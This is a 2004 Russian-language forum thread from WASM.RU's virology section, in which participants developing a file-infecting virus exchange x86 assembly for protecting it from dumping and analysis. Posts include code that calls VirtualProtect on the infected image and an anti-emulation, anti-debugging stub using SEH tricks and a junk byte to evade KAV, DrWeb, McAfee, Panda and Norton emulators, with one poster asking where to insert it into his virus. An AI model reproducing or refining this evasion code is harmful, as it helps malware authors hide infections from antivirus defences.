· Начало · Отвђтить · Статистика · Поиск · FAQ · Правила · Установки · Язык · Выход · WASM.RU · Noir.Ru ·

 WASM Phorum —› WASM.VIROLOGY —› Защита от дампа

<< . 1 . 2 .

Посл.отвђт Сообщенiе


Дата: Ноя 12, 2004 02:47:56

чё делать то блин


Дата: Ноя 12, 2004 02:50:41

а как вам идея ставить после заражения файла
арибуты страниц памяти там где надо NO ACESS


Дата: Ноя 12, 2004 03:06:56 · Поправил: B_108

Держи, 
start:
     call _there
delta=$
     virtual_protect dd 0x77e6169e
mh_offset=$-delta
     module_handle   dd 0x77e7ad86
_there:
     pop  ebp
     push 0
     call dword [ebp+mh_offset]

     mov  ebx, [eax+3ch] ;PE
     add  ebx, eax
     mov  ecx, [ebx+50h] ;Image size

     lea        edx, [esp-4] ;вот что я имел ввиду!

     push       edx
     push       PAGE_EXECUTE_READWRITE
     push       ecx
     push       eax
     call       dword [ebp]

адреса апишек само-собой мои :)


Дата: Ноя 12, 2004 03:07:43

ЗЫ я использую фасм


Дата: Ноя 12, 2004 03:12:54

„а как вам идея ставить после заражения файла
арибуты страниц памяти там где надо NO ACESS“
там где надо, это где?
и зачем? :)
если для того чтобы защититься от самопроверяющих программ,
то они скорее себя с диска считают...


Дата: Ноя 12, 2004 04:25:56

Start:
Call seh_
mov esp, [esp+8]
SALC
SALC
jmp seh_rs
seh_: sub edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
inc byte ptr [edx];дальше этого отладчик не идёт
SALC


gtDelta:call mgdlta
mgdelta:db 0b8h ;disassembler это не берёт
mgdlta: pop ebp
ret

jmp Detect_Av ;<-------переход сюда в ;случае если нас эмулируют
;В это процедуре я делаю деление на ;ноль и запись чтение из портов, KAV DRweb MacAfee Panda и ;Norton antivirus пока оборудование эмулировать не ;научились и сдесь эмулятор запаривается

seh_rs: xor edi, edi
pop dword ptr fs:[edi]
pop edi
;сбда попадаешь в случае если запуск прошёл нормально без ;эмуляторов и отладчиков уровня прилажения


А теперь вопрос:!!!! куда посоветуешь вставить этот кусочек да так чтоб всю тему с AV не испортить.Да и ещё
у меня вирь в виде сплошником идущих данных в файл записывается . Это сделано для облегчения его шифровки в дальнейшем.

Если я чё где не так сказал просьба не смиятся я ещё только недавно внизы пошёл до этого обьектно ориентированым прогрммированием знимался.


Дата: Ноя 12, 2004 12:31:04

А где ты указал смещение своего SEh обработчика?
См. статьи Billy Belcebu


Дата: Ноя 12, 2004 13:32:56

Call seh_

Просмотрел :)


„mgdelta:db 0b8h ;disassembler это не берёт“
ага, блин, если ида с самого начала не просечет,
то после нажатия пары кнопочек все будет дизасемблится нормально.
Имхо, только место занимает

<< . 1 . 2 .
Powered by miniBB 1.6 © 2001-2002
Время загрузки страницы (сек.): 0.055